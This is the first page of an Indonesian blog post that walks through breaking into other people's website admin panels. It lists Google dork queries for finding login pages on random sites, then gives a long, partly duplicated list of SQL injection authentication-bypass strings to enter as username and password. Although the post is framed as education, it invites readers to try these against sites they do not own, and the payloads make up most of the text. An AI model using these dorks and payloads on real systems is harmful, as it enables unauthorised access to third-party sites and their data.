Mohon tunggu...
Edy Susanto
Edy Susanto Mohon Tunggu... IT consultant, writer, citizen journalist, photographer

Seorang ahli keamanan siber yang tidak hanya jago melawan ancaman digital, tetapi juga piawai menjinakkan teknologi blockchain dan membuat data menari-nari dalam visualisasi yang memukau. Sebagai trainer yang penuh semangat, ia mengubah materi yang rumit menjadi sesi belajar yang seru dan mudah dipahami. Di luar dunia teknologi, ia adalah pecinta kucing yang setia, selalu siap mengabadikan momen-momen menggemaskan mereka dalam jepretan fotografi yang artistik. Tak hanya itu, ia juga gemar menulis, mengolah kata demi kata hingga menjadi cerita yang menghibur dan menggugah.

Selanjutnya

Tutup

Inovasi

SQL Injection ke Admin Panel

1 Oktober 2015   10:44 Diperbarui: 29 Oktober 2015   20:03 3782
+
Laporkan Konten
Laporkan Akun
Kompasiana adalah platform blog. Konten ini menjadi tanggung jawab bloger dan tidak mewakili pandangan redaksi Kompas.

[caption caption="sql injection - http://www.marcofolio.net/"][/caption]

SQL Injection adalah salah satu teknik exploit dengan memanfaatkan kelemahan pada database. Pada umumnya ini di inject ( suntik) kedalam form yang membutuhkan input dari user, misalnya buku tamu, komentar, login user , login admin dll.

Kali ini saya akan membagi pengetahuan untuk melakukan injection ke login admin, saya tulis disini sebagai pembelajaran saja agar rekan rekan lebih aware ke keamanan databasenya. Segala resiko tanggung jawab sendiri ya, sekali lagi saya hanya menyajikan dalam kerangka edukasi.

Saya gunakan teknik yang paling sederhana yaitu menggunakan Google Dork di Google Hacking Database, untuk menemukan sasaran yang vulnerable.

Okay.. google dork yang kita akan pakai ada beberapa antara lain , cobain sendiri ya :

  • nurl:manager intitle:Admin Panel
  • inurl:/admin2/ ext:php inurk:/admin/ ext:php
  • inurl:/adminpanel/ ext:php
  • inurl:/admin_panel/
  • inurl:/login.php
  • inurl:/admin.php
  • inurl:/admin
  • inurl:/login.html

Hasilnya kira kira akan nada list seperti dibawah ini :

Demikian hasil dari Google Dork tersebut, tapi apakah semua vulnerable ? belum tentu , di step ini kita harus satu persatu mencoba dengan memasukkan SQL Injection nya.

Nah kita asumsikan sudah mendapatkan admin login , maka kita tinggal coba memasukkan kombinasi rangkaian user dan password sebagai injection nya.

User Name : 

  • ' or 1=1 limit 1 -- -+
  • "' OR 1=1 "
  • admin

Password :

  • ' or 1=1 limit 1 -- -+
  • or ‘1’=’1
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • ' or 'x'='x
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'
  • ==
  • and 1=1--
  • and 1=1
  • ' or 'one'='one--
  • ' or 'one'='one
  • ' and 'one'='one
  • ' and 'one'='one--
  • 1') and '1'='1--
  • admin' --
  • admin' #
  • admin'/*
  • or 1=1--
  • or 1=1#
  • or 1=1/*
  • ) or '1'='1--
  • ) or ('1'='1--
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • ' or 'x'='x
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'

HALAMAN :
  1. 1
  2. 2
  3. 3
  4. 4
Mohon tunggu...

Lihat Konten Inovasi Selengkapnya
Lihat Inovasi Selengkapnya
Beri Komentar
Berkomentarlah secara bijaksana dan bertanggung jawab. Komentar sepenuhnya menjadi tanggung jawab komentator seperti diatur dalam UU ITE

Belum ada komentar. Jadilah yang pertama untuk memberikan komentar!
LAPORKAN KONTEN
Alasan
Laporkan Konten
Laporkan Akun